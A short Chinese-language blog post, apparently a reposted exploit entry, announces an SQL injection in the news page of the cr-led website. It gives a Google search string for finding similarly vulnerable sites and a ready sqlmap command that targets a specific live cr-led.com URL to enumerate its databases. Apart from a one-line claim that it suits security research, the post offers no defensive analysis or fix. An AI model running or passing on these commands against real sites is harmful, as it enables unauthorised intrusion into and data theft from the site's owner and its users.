cr-led网站SQL注入漏洞分析与利用

本文详细披露了cr-led网站新闻页面存在的一个SQL注入安全漏洞,提供了具体的漏洞发现日期、验证方法和利用工具sqlmap的详细命令,适用于安全研究人员进行漏洞验证和防范。

漏洞标题: cr-led - SQL注入

日期: 2025-11-13

漏洞作者: javad rashidi

测试环境: Windows, Linux

Google搜索关键字: inurl:“news.php?id=”

SQL注入漏洞利用

sqlmap命令:

1

sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次